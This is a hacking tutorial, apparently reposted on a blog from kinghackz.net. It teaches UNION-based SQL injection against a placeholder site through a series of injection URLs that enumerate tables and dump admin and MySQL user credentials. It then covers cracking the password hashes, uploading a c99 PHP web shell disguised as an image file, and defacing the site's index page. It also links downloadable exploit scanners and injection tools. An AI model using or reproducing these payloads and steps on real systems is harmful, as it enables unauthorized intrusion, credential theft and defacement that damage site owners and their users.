To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error.http://www.site.com/news.php?id=5 order by 1/* <-- no errorhttp://www.site.com/news.php?id=5 order by 2/* <-- no errorhttp://www.site.com/news.php?id=5 order by 3/* <-- no errorhttp://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function
With union we can select more data in one sql statement.

So we havehttp://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works .

4). Check for MySQL versionhttp://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

Let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

I didn't see any paper covering this problem, so i must write it .

What we need is convert() function

i.e.http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version .

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would behttp://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good )

We know that table admin exists...

Now to check column names.http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password existshttp://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1...

Now we must complete query to look nice

For that we can use concat() function (it joins strings)

i.ehttp://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
Now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

When you have this, you can login like admin or some superuser.

If can't guess the right table name, you can always try mysql.user (default)

It has user password columns, so example would behttp://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.ehttp://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.ehttp://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.ehttp://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table is displayed.

for third table we put limit 2,1

i.ehttp://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would behttp://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
The first column is diplayed.

The second one (we change limit 0,1 to limit 1,1)

ie.http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc...

If you wanna display column names for specific table use this query. (where clause)

Let's say that we found table users.

i.ehttp://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
Now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

Let's say that we found colums user, pass and email.

Now to complete query to put them all together.

For that we use concat() , i decribe it earlier.

i.ehttp://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/

What we get here is user:pass:email from table users.

Example: admin:hash:whatever@blabla.com

** If you are too lazy for doing above stuff you can use tools they will do all the job:

1) Exploit scanner (this will find vulnerable websites)
Code:http://rapidshare.com/files/24802790...oitscanner.zip

2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)
Code:http://rapidshare.com/files/24802907...elperV.2.7.rar

*** use the tools only if you are new to hacking. Do it manually thats the thrill and that is real hacking. When you do it manually you will understand the concept.

In some websites you can directly see the password but most of the websites encrypt them using MD5. so u hav to crack the hash to get the password.

To crack the password there are three ways
1) Check the net whether this hash is cracked before:
Download:http://www.md5decrypter.co.uk

2) Crack the password with the help of a site:
Download::http://www.milw0rm.com/cracker/insert.php

http://passcracking.com/index.php

3) Use a MD5 cracking software:
Download:http://rapidshare.com/files/13696796...CF_2.10_2b.rar

Password = OwlsNest

2) DEFACING THE WEBSITE

After getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.

1) You can use an admin finder website:
Code:http://4dm1n.houbysoft.com/

2) You can use an admin finder software:

Code:http://rapidshare.com/files/248020485/adminfinder.rar

After logging in as the admin you can upload photos to the site. so now you are going to upload a shell into the site using this upload facility.

Dowload the shell here:http://rapidshare.com/files/248023722/c99.rar

Extract it you will get a c99.php upload it.
Some sites wont allow you to upload a php file. so rename it as c99.php.gif
Then upload it.

After that go to http://www.site.com/images (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)

find the c99.php.gif and click it..

Now you can see a big control pannel....
Now you can do what ever you want to do...
Search for the index.html file and replace it with your own file.
So if any one goes to that site they will see your page....
After Doing This click on Logout and You are Done..

From: kinghackz.net

Root-Exploit

หน้าเว็บ

วันอาทิตย์ที่ 19 สิงหาคม พ.ศ. 2555

WAppEx : Web Application Exploiter

Top 10 Important command prompt's commands

วันศุกร์ที่ 17 สิงหาคม พ.ศ. 2555

ค้นหา Admin Login

Admin Page Scripts(1)

Admin Page Scripts(2)

School Management System 1.0 Password / Backup Disclosure

phpBB uploadpic.php Shell Upload

13 STEPS TO HACKING A WEBSITE OR DEFACEMENT

เกี่ยวกับฉัน